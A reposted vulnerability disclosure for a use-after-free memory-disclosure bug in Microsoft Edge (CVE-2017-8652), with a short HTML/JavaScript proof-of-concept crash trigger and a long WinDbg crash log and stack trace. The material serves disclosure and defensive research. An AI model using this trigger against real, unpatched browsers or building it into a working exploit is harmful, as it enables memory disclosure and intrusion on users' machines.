Home / exploitsPDF  

Microsoft Edge textarea.defaultValue Memory Disclosure

Posted on 10 August 2017

Microsoft Edge: textarea.defaultValue memory disclosure CVE-2017-8652 There is a use-after free vulnerability in Microsoft Edge that can lead to memory disclosure. The vulnerability has been confirmed on Windows 10 Enterprise 64-bit (OS version 1607, OS build 14393.1198), Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393. PoC: ========================================== <!-- saved from url=(0014)about:internet --> <script> var n = 0; function go() { document.addEventListener("DOMNodeRemoved", eventhandler); eventhandler(); } function eventhandler() { n++; if(n==5) return; //prevent going into an infinite recursion t.defaultValue = "aaaaaaaaaaaaaaaaaaaa"; f.reset(); } </script> <body onload=go()> <form id="f"> <textarea id="t">aaa</textarea> ========================================= This seems to be the same bug as <a href="https://bugs.chromium.org/p/project-zero/issues/detail?id=1076" title="" class="" rel="nofollow">https://bugs.chromium.org/p/project-zero/issues/detail?id=1076</a> only that one is in IE and this one is in Edge. I don't have symbols for the latest Edge after May update, so crash log doesn't make much sense but here it is anyway: ========================================= (1618.1258): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSSYSTEM32edgehtml.dll - edgehtml!Ordinal125+0x6446c: 00007ffe`843d615c 6641393e cmp word ptr [<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>],di ds:000001fa`3389cfd4=???? 0:013> !heap -p -a 000001fa`3389cfd4 address 000001fa3389cfd4 found in _DPH_HEAP_ROOT @ 1f20b961000 in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize) 1fa33116138: 1fa3389c000 2000 00007ffe9fb1b90b ntdll!RtlDebugReAllocateHeap+0x0000000000000047 00007ffe9fadcbfe ntdll!RtlpReAllocateHeapInternal+0x000000000008729e 00007ffe9fa55941 ntdll!RtlReAllocateHeap+0x0000000000000031 00007ffe845cc2fa edgehtml!CreateWebDriverAdapter+0x00000000000504ba 00007ffe845cbd74 edgehtml!CreateWebDriverAdapter+0x000000000004ff34 00007ffe8462fbb8 edgehtml!Ordinal107+0x0000000000056a48 00007ffe84d05143 edgehtml!Ordinal106+0x0000000000018e63 00007ffe845ab544 edgehtml!CreateWebDriverAdapter+0x000000000002f704 00007ffe846b0747 edgehtml!Ordinal107+0x00000000000d75d7 00007ffe84ae5c8f edgehtml!ClearPhishingFilterData+0x00000000000beeaf 00007ffe84792bb5 edgehtml!DllEnumClassObjects+0x0000000000043245 00007ffe83c41227 chakra!DllGetClassObject+0x0000000000001d97 00007ffe83c7a3d7 chakra!MemProtectHeapUnrootAndZero+0x00000000000038e7 00007ffe83aef541 chakra!JsProjectWinRTNamespace+0x0000000000046621 000001fa1cf7057e +0x000001fa1cf7057e 0:013> r rax=0000000000000000 rbx=000001fa2d058a40 rcx=000001f212910000 rdx=0000004d44824f5c rsi=0000000000000000 rdi=0000000000000000 rip=00007ffe843d615c rsp=0000004d44824f10 rbp=0000004d44825010 <a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000ffffffff <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=000001f212910000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=00007ffe85156fd0 <a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000001f212841a90 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000000 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000014 <a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=000001fa3389cfd4 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=000001f2128e8840 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 edgehtml!Ordinal125+0x6446c: 00007ffe`843d615c 6641393e cmp word ptr [<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>],di ds:000001fa`3389cfd4=???? 0:013> k # Child-SP RetAddr Call Site 00 0000004d`44824f10 00007ffe`844bc561 edgehtml!Ordinal125+0x6446c 01 0000004d`44826190 00007ffe`8459a535 edgehtml!Ordinal105+0x13631 02 0000004d`448261e0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e6f5 03 0000004d`44826340 00007ffe`84d03e81 edgehtml!Ordinal106+0x18f9e 04 0000004d`448263c0 00007ffe`84447753 edgehtml!Ordinal106+0x17ba1 05 0000004d`448263f0 00007ffe`8453341c edgehtml!Ordinal125+0xd5a63 06 0000004d`448264e0 00007ffe`847afc55 edgehtml!GetWebPlatformObject+0xbb4c *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:WINDOWSSYSTEM32chakra.dll - 07 0000004d`44826520 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x602e5 08 0000004d`44826550 000001fa`1cf70641 chakra!DllGetClassObject+0x1d97 09 0000004d`44826630 00007ffe`83cf90a3 0x000001fa`1cf70641 0a 0000004d`448266c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 0b 0000004d`44826710 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 0c 0000004d`44826770 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 0d 0000004d`44826860 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 0e 0000004d`448268d0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 0f 0000004d`44826970 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 10 0000004d`44826a00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 11 0000004d`44826aa0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 12 0000004d`44826af0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 13 0000004d`44826b30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 14 0000004d`44826cb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 15 0000004d`44826d30 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 16 0000004d`44826e90 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 17 0000004d`44826ed0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 18 0000004d`448271a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 19 0000004d`448271f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 1a 0000004d`44827360 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 1b 0000004d`448273a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 1c 0000004d`448274b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 1d 0000004d`44827610 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 1e 0000004d`44827690 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 1f 0000004d`448276c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 20 0000004d`448277c0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 21 0000004d`44827800 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 22 0000004d`44827840 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 23 0000004d`44827870 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 24 0000004d`44827950 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 25 0000004d`44827a30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 26 0000004d`44827af0 00007ffe`83cf90a3 0x000001fa`1cf7057e 27 0000004d`44827b80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 28 0000004d`44827bd0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 29 0000004d`44827c30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 2a 0000004d`44827d20 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 2b 0000004d`44827d90 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 2c 0000004d`44827e30 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 2d 0000004d`44827ec0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 2e 0000004d`44827f60 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 2f 0000004d`44827fb0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 30 0000004d`44827ff0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 31 0000004d`44828170 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 32 0000004d`448281f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 33 0000004d`44828350 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 34 0000004d`44828390 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 35 0000004d`44828660 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 36 0000004d`448286b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 37 0000004d`44828820 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 38 0000004d`44828860 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 39 0000004d`44828970 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 3a 0000004d`44828ad0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 3b 0000004d`44828b50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 3c 0000004d`44828b80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 3d 0000004d`44828c80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 3e 0000004d`44828cc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 3f 0000004d`44828d00 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 40 0000004d`44828d30 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 41 0000004d`44828e10 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 42 0000004d`44828ef0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 43 0000004d`44828fb0 00007ffe`83cf90a3 0x000001fa`1cf7057e 44 0000004d`44829040 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 45 0000004d`44829090 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 46 0000004d`448290f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 47 0000004d`448291e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 48 0000004d`44829250 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 49 0000004d`448292f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 4a 0000004d`44829380 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 4b 0000004d`44829420 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 4c 0000004d`44829470 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 4d 0000004d`448294b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 4e 0000004d`44829630 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 4f 0000004d`448296b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 50 0000004d`44829810 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 51 0000004d`44829850 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 52 0000004d`44829b20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 53 0000004d`44829b70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 54 0000004d`44829ce0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 55 0000004d`44829d20 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 56 0000004d`44829e30 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 57 0000004d`44829f90 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 58 0000004d`4482a010 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 59 0000004d`4482a040 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 5a 0000004d`4482a140 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 5b 0000004d`4482a180 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 5c 0000004d`4482a1c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 5d 0000004d`4482a1f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 5e 0000004d`4482a2d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 5f 0000004d`4482a3b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 60 0000004d`4482a470 00007ffe`83cf90a3 0x000001fa`1cf7057e 61 0000004d`4482a500 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 62 0000004d`4482a550 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 63 0000004d`4482a5b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 64 0000004d`4482a6a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 65 0000004d`4482a710 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 66 0000004d`4482a7b0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 67 0000004d`4482a840 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 68 0000004d`4482a8e0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 69 0000004d`4482a930 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 6a 0000004d`4482a970 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 6b 0000004d`4482aaf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 6c 0000004d`4482ab70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 6d 0000004d`4482acd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 6e 0000004d`4482ad10 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 6f 0000004d`4482afe0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 70 0000004d`4482b030 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 71 0000004d`4482b1a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 72 0000004d`4482b1e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 73 0000004d`4482b2f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 74 0000004d`4482b450 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 75 0000004d`4482b4d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 76 0000004d`4482b500 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 77 0000004d`4482b600 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 78 0000004d`4482b640 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 79 0000004d`4482b680 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 7a 0000004d`4482b6b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 7b 0000004d`4482b790 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 7c 0000004d`4482b870 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 7d 0000004d`4482b930 00007ffe`83cf90a3 0x000001fa`1cf7057e 7e 0000004d`4482b9c0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 7f 0000004d`4482ba10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 80 0000004d`4482ba70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 81 0000004d`4482bb60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 82 0000004d`4482bbd0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 83 0000004d`4482bc70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 84 0000004d`4482bd00 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac 85 0000004d`4482bda0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add 86 0000004d`4482bdf0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 87 0000004d`4482be30 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 88 0000004d`4482bfb0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 89 0000004d`4482c030 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a 8a 0000004d`4482c190 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 8b 0000004d`4482c1d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 8c 0000004d`4482c4a0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 8d 0000004d`4482c4f0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 8e 0000004d`4482c660 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 8f 0000004d`4482c6a0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 90 0000004d`4482c7b0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d 91 0000004d`4482c910 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e 92 0000004d`4482c990 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a 93 0000004d`4482c9c0 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 94 0000004d`4482cac0 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 95 0000004d`4482cb00 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf 96 0000004d`4482cb40 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 97 0000004d`4482cb70 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 98 0000004d`4482cc50 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 99 0000004d`4482cd30 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 9a 0000004d`4482cdf0 00007ffe`83cf90a3 0x000001fa`1cf7057e 9b 0000004d`4482ce80 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 9c 0000004d`4482ced0 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 9d 0000004d`4482cf30 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c 9e 0000004d`4482d020 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 9f 0000004d`4482d090 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 a0 0000004d`4482d130 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 a1 0000004d`4482d1c0 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac a2 0000004d`4482d260 00007ffe`84650b98 edgehtml!Ordinal107+0x77add a3 0000004d`4482d2b0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 a4 0000004d`4482d2f0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 a5 0000004d`4482d470 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 a6 0000004d`4482d4f0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a a7 0000004d`4482d650 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 a8 0000004d`4482d690 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 a9 0000004d`4482d960 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 aa 0000004d`4482d9b0 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 ab 0000004d`4482db20 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 ac 0000004d`4482db60 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 ad 0000004d`4482dc70 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d ae 0000004d`4482ddd0 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e af 0000004d`4482de50 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a b0 0000004d`4482de80 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 b1 0000004d`4482df80 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 b2 0000004d`4482dfc0 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf b3 0000004d`4482e000 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 b4 0000004d`4482e030 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 b5 0000004d`4482e110 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 b6 0000004d`4482e1f0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 b7 0000004d`4482e2b0 00007ffe`83cf90a3 0x000001fa`1cf7057e b8 0000004d`4482e340 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 b9 0000004d`4482e390 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 ba 0000004d`4482e3f0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c bb 0000004d`4482e4e0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 bc 0000004d`4482e550 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 bd 0000004d`4482e5f0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 be 0000004d`4482e680 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac bf 0000004d`4482e720 00007ffe`84650b98 edgehtml!Ordinal107+0x77add c0 0000004d`4482e770 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 c1 0000004d`4482e7b0 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 c2 0000004d`4482e930 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 c3 0000004d`4482e9b0 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a c4 0000004d`4482eb10 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 c5 0000004d`4482eb50 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 c6 0000004d`4482ee20 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 c7 0000004d`4482ee70 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 c8 0000004d`4482efe0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 c9 0000004d`4482f020 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 ca 0000004d`4482f130 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d cb 0000004d`4482f290 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e cc 0000004d`4482f310 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a cd 0000004d`4482f340 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 ce 0000004d`4482f440 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 cf 0000004d`4482f480 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf d0 0000004d`4482f4c0 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 d1 0000004d`4482f4f0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 d2 0000004d`4482f5d0 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 d3 0000004d`4482f6b0 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 d4 0000004d`4482f770 00007ffe`83cf90a3 0x000001fa`1cf7057e d5 0000004d`4482f800 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 d6 0000004d`4482f850 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 d7 0000004d`4482f8b0 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c d8 0000004d`4482f9a0 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 d9 0000004d`4482fa10 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 da 0000004d`4482fab0 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 db 0000004d`4482fb40 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac dc 0000004d`4482fbe0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add dd 0000004d`4482fc30 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 de 0000004d`4482fc70 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 df 0000004d`4482fdf0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 e0 0000004d`4482fe70 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a e1 0000004d`4482ffd0 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 e2 0000004d`44830010 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 e3 0000004d`448302e0 00007ffe`847edaa2 edgehtml!Ordinal138+0x32876 e4 0000004d`44830330 00007ffe`845ad572 edgehtml!DllEnumClassObjects+0x9e132 e5 0000004d`448304a0 00007ffe`845a7609 edgehtml!CreateWebDriverAdapter+0x31732 e6 0000004d`448304e0 00007ffe`8459a29d edgehtml!CreateWebDriverAdapter+0x2b7c9 e7 0000004d`448305f0 00007ffe`84d0527e edgehtml!CreateWebDriverAdapter+0x1e45d e8 0000004d`44830750 00007ffe`84d0515a edgehtml!Ordinal106+0x18f9e e9 0000004d`448307d0 00007ffe`845ab544 edgehtml!Ordinal106+0x18e7a ea 0000004d`44830800 00007ffe`846b0747 edgehtml!CreateWebDriverAdapter+0x2f704 eb 0000004d`44830900 00007ffe`84ae5c8f edgehtml!Ordinal107+0xd75d7 ec 0000004d`44830940 00007ffe`84792bb5 edgehtml!ClearPhishingFilterData+0xbeeaf ed 0000004d`44830980 00007ffe`83c41227 edgehtml!DllEnumClassObjects+0x43245 ee 0000004d`448309b0 00007ffe`83c7a3d7 chakra!DllGetClassObject+0x1d97 ef 0000004d`44830a90 00007ffe`83aef541 chakra!MemProtectHeapUnrootAndZero+0x38e7 f0 0000004d`44830b70 000001fa`1cf7057e chakra!JsProjectWinRTNamespace+0x46621 f1 0000004d`44830c30 00007ffe`83cf90a3 0x000001fa`1cf7057e f2 0000004d`44830cc0 00007ffe`83c68203 chakra!MemProtectHeapReportHeapSize+0x10013 f3 0000004d`44830d10 00007ffe`83c9cf7c chakra!DllGetClassObject+0x28d73 f4 0000004d`44830d70 00007ffe`83c9c546 chakra!MemProtectHeapUnrootAndZero+0x2648c f5 0000004d`44830e60 00007ffe`83cde729 chakra!MemProtectHeapUnrootAndZero+0x25a56 f6 0000004d`44830ed0 00007ffe`83ca29e1 chakra!JsVarToExtension+0xa3e9 f7 0000004d`44830f70 00007ffe`83c9e59c chakra!MemProtectHeapUnrootAndZero+0x2bef1 f8 0000004d`44831000 00007ffe`84650c4d chakra!MemProtectHeapUnrootAndZero+0x27aac f9 0000004d`448310a0 00007ffe`84650b98 edgehtml!Ordinal107+0x77add fa 0000004d`448310f0 00007ffe`8458ac07 edgehtml!Ordinal107+0x77a28 fb 0000004d`44831130 00007ffe`8458a9f7 edgehtml!CreateWebDriverAdapter+0xedc7 fc 0000004d`448312b0 00007ffe`8464f59a edgehtml!CreateWebDriverAdapter+0xebb7 fd 0000004d`44831330 00007ffe`844b61e4 edgehtml!Ordinal107+0x7642a fe 0000004d`44831490 00007ffe`845a0e21 edgehtml!Ordinal105+0xd2b4 ff 0000004d`448314d0 00007ffe`8505d046 edgehtml!CreateWebDriverAdapter+0x24fe1 ========================================= This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric

 

TOP